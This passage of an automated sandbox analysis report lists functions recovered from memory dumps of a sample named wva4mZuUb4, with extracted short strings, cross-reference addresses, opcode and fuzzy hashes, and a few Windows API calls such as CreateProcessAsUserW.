Instruction Fuzzy Hash: 8FB30A70A053198FCB58FF39E9896ACBBF2BB84310F4185A9D449A3358DF349D948F85

Function 08F0C1D8 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"*p, xrefs: 08F0C327
"*p, xrefs: 08F0C310
e\1, xrefs: 08F0C2C5
e\1, xrefs: 08F0C2CC

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: e\1$e\1$"*p$"*p
API String ID: 0-1513742261
Opcode ID: 1c267a2bb06d17ccdf7809536ecd7315986c4b3714d605a14a2b25a1a72f289f
Instruction ID: 9a179b2ab5c22c46ba7f8ce55f330811cb3f1d5432d215e1a8c992c1d9e5b5e4
Opcode Fuzzy Hash: 1c267a2bb06d17ccdf7809536ecd7315986c4b3714d605a14a2b25a1a72f289f
Instruction Fuzzy Hash: D081F3B4D05219CFCB14CFE9D9446AEBBF2BF88301F20952AC416BB294D7345A02DF64

Function 01378388 Relevance: 4.2, Strings: 3, Instructions: 471COMMON

Download Yara Rule

Strings

(oq, xrefs: 013785E0
(oq, xrefs: 013785D2
(oq, xrefs: 013788FD

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq
API String ID: 0-3376450984
Opcode ID: 5f7c608e9c2955e2fa6668fdd8db85d575d214a5e8e33a200ef1a6dcf8a89e1c
Instruction ID: ab712229c6febc8bc86db5f1c21784115125d882d0c00b8ebe2dcba56759fb93
Opcode Fuzzy Hash: 5f7c608e9c2955e2fa6668fdd8db85d575d214a5e8e33a200ef1a6dcf8a89e1c
Instruction Fuzzy Hash: 15125F31A00209DFDB25CF69D888AADBBF6FF88318F1480A9E515AB265D738DC51CF50

Function 08F04B50 Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

6f, xrefs: 08F04DA2
$q, xrefs: 08F04BD9
6f, xrefs: 08F04DB0

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 6f$6f$$q
API String ID: 0-2870187524
Opcode ID: 3da05426e276cf51062b290a045a3e1fb92acef9991c9be780ed4544f4cc8da1
Instruction ID: 70866ba772591fe40bf89ad60e4d8f9ff5a530e4396204fac4ccc8630212d436
Opcode Fuzzy Hash: 3da05426e276cf51062b290a045a3e1fb92acef9991c9be780ed4544f4cc8da1
Instruction Fuzzy Hash: 3571E4B4E00319DFDB54DFA9E58869EBBB2FF88301F20802AD906AB354DB345981CF55

Function 062706E0 Relevance: 3.5, Strings: 2, Instructions: 977COMMON

Download Yara Rule

Strings

U, xrefs: 062712A9
PHq, xrefs: 06270881

Memory Dump Source

Source File: 00000000.00000002.1923700244.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6270000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: PHq$U
API String ID: 0-1655173598
Opcode ID: b99041e54ca3e20a3f1d9ec12051a47c3489d530a67637c83f6174e4ecb9a47d
Instruction ID: 07dbf18742310243b1dce2cc17da12ca8a43dce78c6f2620f38ab0401d2780dd
Opcode Fuzzy Hash: b99041e54ca3e20a3f1d9ec12051a47c3489d530a67637c83f6174e4ecb9a47d
Instruction Fuzzy Hash: 5872BE71B102058FEB98AB79D854B6E77A7BFC8210F248529E546DB3A4CF34DC06CB91

Function 0780CECF Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

Teq, xrefs: 0780D14A
Teq, xrefs: 0780CF71

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: fc87abca3f6ccd031e1b04d1f7311c668eb4dc46a13997d609482a73af67c8e2
Instruction ID: e1863ec866b0d1b7b429839759bf4f7eba9debd507f6bf3a326feddeac93e63f
Opcode Fuzzy Hash: fc87abca3f6ccd031e1b04d1f7311c668eb4dc46a13997d609482a73af67c8e2
Instruction Fuzzy Hash: F79103B0E142098FDB48CFA9C894ADEFBB2FF89310F24912AD415AB354D7749946CF61

Function 0780CF08 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

Teq, xrefs: 0780D14A
Teq, xrefs: 0780CF71

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 69961e34d3327b8ede905a0c32a945f3e0aac918193de1a7536209be603678dd
Instruction ID: cf76eee37c682a90fa4f292faf7d40785fecaba74be8bfb611e5dfd7a43f015d
Opcode Fuzzy Hash: 69961e34d3327b8ede905a0c32a945f3e0aac918193de1a7536209be603678dd
Instruction Fuzzy Hash: 5C91E1B4E102098FDB48CFAAC984ADEFBB2FF89300F24912AD415BB354D77499458F61

Function 08F04B40 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

$q, xrefs: 08F04BD9
6f, xrefs: 08F04DB0

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 6f$$q
API String ID: 0-559323919
Opcode ID: 81a975a5bf01aac1f3789ea414aa15e6cf843345d47abc99ee70a0a67f8551a0
Instruction ID: 838d3edf4b82744793ca5f84b763a944b15e4b2bc1db6654831a7a63c0003bd1
Opcode Fuzzy Hash: 81a975a5bf01aac1f3789ea414aa15e6cf843345d47abc99ee70a0a67f8551a0
Instruction Fuzzy Hash: 7371E6B4E00309DFDB54DFA9E58469EBBB2FF89301F24842AD90AA7394DB345942CF51

Function 01377D60 Relevance: 1.8, Strings: 1, Instructions: 517COMMON

Download Yara Rule

Strings

(oq, xrefs: 0137829A

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: 47e72930ef32ae91ae56091b7c021f8048376acd7314b5577b7f239a5ee503cd
Instruction ID: 0135968ae75f109827a714c48a06176e91f82a6a3493644c45d16fe536ddfae6
Opcode Fuzzy Hash: 47e72930ef32ae91ae56091b7c021f8048376acd7314b5577b7f239a5ee503cd
Instruction Fuzzy Hash: 21127B70A002098FDB24DF69D848BAEBBF6FF88314F248569E546DB355DB389D41CB90

Function 08F0BC58 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08F0BDC3

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: db86f16ad1fbaa5723818c0cb5346173ebdc33cff683c70bae7d8f68bb1e4e15
Instruction ID: 939dcfb222517375748a092ef3036f4cc7daf1c1468529abebcba858be049988
Opcode Fuzzy Hash: db86f16ad1fbaa5723818c0cb5346173ebdc33cff683c70bae7d8f68bb1e4e15
Instruction Fuzzy Hash: 8351F471D00229DFDB24CFA9C840BDDBBB5BF48314F0484AAE918B7250DB759A89DF90

Function 01371B08 Relevance: 1.6, Strings: 1, Instructions: 356COMMON

Download Yara Rule

Strings

$q, xrefs: 01371C2E

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 6a21b4db9c549277add02628843788c54e13468eac6f1b060e1d1507877fb186
Instruction ID: 565db81a117b8d942ddf0851d0171d981db353e9d55fea5b73db0d43e917ff77
Opcode Fuzzy Hash: 6a21b4db9c549277add02628843788c54e13468eac6f1b060e1d1507877fb186
Instruction Fuzzy Hash: 26B1B335B043189FEB289B79985567E7BF7BFC8310B04892EE546D7788DE39C8028791

Function 0780EFF8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

kQD, xrefs: 0780F278

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: kQD
API String ID: 0-3066535408
Opcode ID: 0d86f48cbbcce5e8fc28662ac21ceab06d9bafdea33487c6fd91aede257943aa
Instruction ID: 0b307b2892476e5ba40cd13b1aed752281dee17f6fd702f4738e3a4bb90c73e6
Opcode Fuzzy Hash: 0d86f48cbbcce5e8fc28662ac21ceab06d9bafdea33487c6fd91aede257943aa
Instruction Fuzzy Hash: E1C157B4D0420ADFCB64CFA9C9849AEFBB2FF99300F10C559C615AB254D734A982CF90

Function 0780D780 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

>NG, xrefs: 0780D836

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: >NG
API String ID: 0-1926143806
Opcode ID: a4477517c1c19e058c30d87604ddba0aac157adad0a5c2b3b187183395915eda
Instruction ID: 08cae8c64884bf1ecf29a3bbdbf2405a035450d61573fad7bcb3bc7f700d8bfb
Opcode Fuzzy Hash: a4477517c1c19e058c30d87604ddba0aac157adad0a5c2b3b187183395915eda
Instruction Fuzzy Hash: DC6169B1E142098FDB48CFE9D9446AEFBF2BF89201F24C46AD419E7294D7348941CFA4

Function 07808DB8 Relevance: 1.4, Instructions: 1392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5940b9d6b643ac0c7a95c9ebb6b8d5dbbe36d716627d9d19f18cbd572894367f
Instruction ID: 6a772cc5f6a40635a1d318371d986cba0e8a5376d1539ac1461a015c9c3731c1
Opcode Fuzzy Hash: 5940b9d6b643ac0c7a95c9ebb6b8d5dbbe36d716627d9d19f18cbd572894367f
Instruction Fuzzy Hash: E8C24E70F003188FCB58AB79D99979EBFB2BB88300F5085A9D449A3754DF389D58CB91

Function 0780AE53 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

<, xrefs: 0780AF85

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 99cbe38e187580e2c67f5e945ca1e87aff99536ffad4953da391679b65a17cdb
Instruction ID: 3460b045cd001b4e3f02a2f088c5711cd7e2ea74ba0cb00850ca6f8540406b0b
Opcode Fuzzy Hash: 99cbe38e187580e2c67f5e945ca1e87aff99536ffad4953da391679b65a17cdb
Instruction Fuzzy Hash: FC5181B1E01758CFDB59CFAAC9446DDBBF2AF89305F14C0AAD409AB264DB345A85CF40

Function 08F06D70 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3463a9affd8f909353a913df08950a37bf6380adf82dcd7d3c3f7f71a1727683
Instruction ID: 33bd1b2f92dd4b727138b8d156a2e051e026650ec2a1af47291f5cf15d6a82c3
Opcode Fuzzy Hash: 3463a9affd8f909353a913df08950a37bf6380adf82dcd7d3c3f7f71a1727683
Instruction Fuzzy Hash: 1BF13471E0176A8FCB64CF69C94479DBBB6BF88341F1485EAD40EAB254D770AA81CF00

Function 0137147E Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a353ff310bd61bda8aec3db0436f679331c2397f656d6782ad562e91ec3542
Instruction ID: ef5269e61a8b0ce1bcce4915cc8864a3c092801eb7b6296aee7e6b5b1e3f3c9c
Opcode Fuzzy Hash: 94a353ff310bd61bda8aec3db0436f679331c2397f656d6782ad562e91ec3542
Instruction Fuzzy Hash: 3F51C332F003048FE7349B7AD8547AA7BE3BB89714F188428E5469F394CE799C418B91

Function 08F06620 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ac0eeb70c8ff53b0c1afd9678bdca13136a42e510e9b57e5db2443f65f0c81
Instruction ID: 7e8fed50f1c7ae018966478cd2622706e4529e1636eb614dfac9fe9a5ed3cbb8
Opcode Fuzzy Hash: c8ac0eeb70c8ff53b0c1afd9678bdca13136a42e510e9b57e5db2443f65f0c81
Instruction Fuzzy Hash: 176117B0D0131ADFCB14CFE9D558AAEBBB1FF58301F108529D412AB290D7789A11EF55

Function 08F0661B Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4275921dd2c4a46ecc32d78a275dfb256be2a176aa0b20db0d0bf6ce2297d241
Instruction ID: fee40428e2454a8b6c81e8e1a0f7125bce746d2cfb95ea2241257985a0459008
Opcode Fuzzy Hash: 4275921dd2c4a46ecc32d78a275dfb256be2a176aa0b20db0d0bf6ce2297d241
Instruction Fuzzy Hash: 35513AB0D0031ADFCB14CFA9D5586AEBBB2FF58302F10852AD412EB290E7789A11DF51

Function 0780E148 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41534bf5b60fd6f1e87973e32c4e0ca811b550743ff2abeb89d48b63889e6090
Instruction ID: 272754bf65da1a8e37a4aa4c0a7eec881e9f07e26f3b8e254a12f572e6179a6e
Opcode Fuzzy Hash: 41534bf5b60fd6f1e87973e32c4e0ca811b550743ff2abeb89d48b63889e6090
Instruction Fuzzy Hash: E7514CB1D01758CFDB58CFA5D9846DEBBB2BF89310F1484AAD409AB254CB345A85CF90

Function 0780BEEB Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcdfa93db77f7cc1327959e439bd900d5545c5513f3c0404fd7da1763100a66
Instruction ID: f0f45a4ca8b458b00ce336640e8f4c52bb38e6194ce16a2ae96672984d4a7091
Opcode Fuzzy Hash: 5dcdfa93db77f7cc1327959e439bd900d5545c5513f3c0404fd7da1763100a66
Instruction Fuzzy Hash: E1412CB5E006598FEB59CF6ADC4079EBBB3BFC9200F14C1AAD508AB254DB341A45CF61

Function 08F01820 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 700d2cb4f5e3b773f40b40d4f394a4d22a5ca5ac2674a4190f3fedf95aeb039b
Instruction ID: 1556272264148b986e67b71991bff72382499cb226a71fd59d1ee3aa309859de
Opcode Fuzzy Hash: 700d2cb4f5e3b773f40b40d4f394a4d22a5ca5ac2674a4190f3fedf95aeb039b
Instruction Fuzzy Hash: AC21AA71E016188FEB58CFABDC4469EFBF7ABC8200F14C1BAD518A6254EB3416558F51

Function 0137B848 Relevance: 8.8, Strings: 7, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 0137B8A5
PHq, xrefs: 0137B963
Teq, xrefs: 0137B892
Teq, xrefs: 0137B877
Teq, xrefs: 0137B8B1
Teq, xrefs: 0137B862
Teq, xrefs: 0137B883

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: PHq$Teq$Teq$Teq$Teq$Teq$Teq
API String ID: 0-4244342005
Opcode ID: a0e5020a92c0d6571ebc553d83f6c208786b6554a056140629e646de9826bba2
Instruction ID: efe098d12698acd008a399b81eb8de9bf2b796211cc8a36666de4d10856e6855
Opcode Fuzzy Hash: a0e5020a92c0d6571ebc553d83f6c208786b6554a056140629e646de9826bba2
Instruction Fuzzy Hash: 85318430E002099BDB349F6985547AEFAF2BF8D714F248419D466A7388CF794C45DB91

Function 01378AB0 Relevance: 8.0, Strings: 6, Instructions: 452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 01378FCF
(oq, xrefs: 01378FBF
(oq, xrefs: 01378BD5
(oq, xrefs: 01378C72
(oq, xrefs: 01378BA9
(oq, xrefs: 01378AEE

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq
API String ID: 0-4267992933
Opcode ID: e780dc89d963c0b3e0d46310337da96ddce9a04ef0c9f9063354887737cb07c7
Instruction ID: 669575f639facaf4eb9514523036e8dde3a49799d86fc5dfa7e4acda84444d15
Opcode Fuzzy Hash: e780dc89d963c0b3e0d46310337da96ddce9a04ef0c9f9063354887737cb07c7
Instruction Fuzzy Hash: 61125C30A00249DFDB25CF68D988A9EBBF2FF88318F1485A9E519DB661D734EC41CB50

Function 01375D38 Relevance: 7.7, Strings: 6, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tPq, xrefs: 01375E52
$q, xrefs: 01375DFA
$q, xrefs: 01375E06
tPq, xrefs: 01375E48
tPq, xrefs: 01375E2C
$q, xrefs: 01375DE0

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: tPq$tPq$tPq$$q$$q$$q
API String ID: 0-1383060187
Opcode ID: a6aca8492a9410e227f814083583507bd43bb8678d0921a1cb871e36164f2dca
Instruction ID: f976ee00271557aca3c4f68f345d88db72de8c8498af346660d3685b88ca3e6b
Opcode Fuzzy Hash: a6aca8492a9410e227f814083583507bd43bb8678d0921a1cb871e36164f2dca
Instruction Fuzzy Hash: CD51B330B003059FE7389B69C8047AABBE6FF89704F14C86EE11ACB665DA39DC41C791

Function 0137B838 Relevance: 6.3, Strings: 5, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 0137B8A5
PHq, xrefs: 0137B963
Teq, xrefs: 0137B892
Teq, xrefs: 0137B877
Teq, xrefs: 0137B862

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: PHq$Teq$Teq$Teq$Teq
API String ID: 0-4172515056
Opcode ID: 4c72ba73fad40f988ceb2e23d38711c60246a96c79e93f8e0609186e08df57ad
Instruction ID: a4155b241ceabc8c20b5dfa013bd65f9d396f3c5b53d374c08ec1d923767378c
Opcode Fuzzy Hash: 4c72ba73fad40f988ceb2e23d38711c60246a96c79e93f8e0609186e08df57ad
Instruction Fuzzy Hash: 6B318030E00209DFEB349F69C4557AEBAF2BF89714F24842DE466A7388CB794C41CB91

Function 014ECB09 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014ECB96
GetCurrentThread.KERNEL32 ref: 014ECBD3
GetCurrentProcess.KERNEL32 ref: 014ECC10
GetCurrentThreadId.KERNEL32 ref: 014ECC69

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1b877dd3a88c9490336d899d36b377571ab48fed2f8415999b07e7d4700c7ef8
Instruction ID: 8402c8be28bc88caea181b63bc3046c5aa5d6ca4c45a8de0d637dacb187bea6f
Opcode Fuzzy Hash: 1b877dd3a88c9490336d899d36b377571ab48fed2f8415999b07e7d4700c7ef8
Instruction Fuzzy Hash: 935146B1D00609CFEB18DFAAD588BDEBBF1EB48314F24806AE409A7361D7346945CB65

Function 014ECB18 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014ECB96
GetCurrentThread.KERNEL32 ref: 014ECBD3
GetCurrentProcess.KERNEL32 ref: 014ECC10
GetCurrentThreadId.KERNEL32 ref: 014ECC69

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f4ffa39e8f1bc5b9932e37091766b0297d916edd288068ca062eaa203da686ba
Instruction ID: 9ae42a25e3a0591c0e395d6c237f27aa6a9adcb762394dc339430beee7618c6b
Opcode Fuzzy Hash: f4ffa39e8f1bc5b9932e37091766b0297d916edd288068ca062eaa203da686ba
Instruction Fuzzy Hash: 725145B0D00609CFEB58CFAAD588BDEBBF1EF48304F20846AE009AB360D7345944CB65

Function 0137BDD0 Relevance: 5.5, Strings: 4, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;q, xrefs: 0137C214
4'q, xrefs: 0137BDF9
4'q, xrefs: 0137BE1F
4'q, xrefs: 0137C36B

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$;q
API String ID: 0-3883815979
Opcode ID: e1c0cea537a1dcbb1174088aa9190751c08799e21497884e5b57cf0531876978
Instruction ID: 1517f19ce688c9e9c42bf7aa51068a913c22295488665245b5e8c5e40eea5aa2
Opcode Fuzzy Hash: e1c0cea537a1dcbb1174088aa9190751c08799e21497884e5b57cf0531876978
Instruction Fuzzy Hash: 59F182303082068FEB359A3DD85473D7BEAAF85618F1850BAE606CF7A6DA2DCC41D751

Function 01375D29 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

$q, xrefs: 01375DFA
tPq, xrefs: 01375E48
tPq, xrefs: 01375E2C
$q, xrefs: 01375DE0

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: tPq$tPq$$q$$q
API String ID: 0-3679180566
Opcode ID: e62347d6191ab7447091e4352bb63d4cd958463978511bddebfdf248a4fa8eaa
Instruction ID: 4311b2a92159015d311ac91e256e1e7fdd62752b4e3d2a81a25d746e4f73bb19
Opcode Fuzzy Hash: e62347d6191ab7447091e4352bb63d4cd958463978511bddebfdf248a4fa8eaa
Instruction Fuzzy Hash: FF31E830B003059FE7395B7988047ABBAE3BB85704F18CC2ED0598BB95CB7A9C41C792

Function 01379B88 Relevance: 4.6, Strings: 3, Instructions: 829COMMON

Download Yara Rule

Strings

(oq, xrefs: 0137A889
$q, xrefs: 0137A6AC
$q, xrefs: 0137A6CF

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: (oq$$q$$q
API String ID: 0-553014825
Opcode ID: 6c0bbdd2d0fe8c5f2419b9fdad20ab3d4c278c407b482c070a4a03dfc7843c7a
Instruction ID: e8c1644bf31bccc3b8f6782839cbc2c7d3f23e4721989800fcfcce6df11c41e5
Opcode Fuzzy Hash: 6c0bbdd2d0fe8c5f2419b9fdad20ab3d4c278c407b482c070a4a03dfc7843c7a
Instruction Fuzzy Hash: CE722274A002198FEB299BA4C854BAEBB73FF84300F1081AED14A6B3A5DF355D85DF51

Function 0137CA40 Relevance: 2.9, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

4'q, xrefs: 0137CDA4
4'q, xrefs: 0137CD8D

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 0b8ebc4c724f6aee5aaa95961d597148e7c1a34da3b788a1a0d4956c76d67afd
Instruction ID: 480c29b129559707c8b369bf352c4f4ae2973d143066672d8762fb5fe726e3ac
Opcode Fuzzy Hash: 0b8ebc4c724f6aee5aaa95961d597148e7c1a34da3b788a1a0d4956c76d67afd
Instruction Fuzzy Hash: DBD1C6306003069FDB21CF6CD8846AABBB6FF85314F148566E959DB362D735EC12CBA1

Function 0137B5E0 Relevance: 2.6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

Strings

Teq, xrefs: 0137B6C4
03[, xrefs: 0137B610

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 03[$Teq
API String ID: 0-1606496134
Opcode ID: c02820ea434f170db4d3d8d5182eb9f5449fb5e054f3f9526737b17006274402
Instruction ID: 5d83e3b820046ed1166cc440534390ede9dcbcf369948e17631ca1abca5c33fc
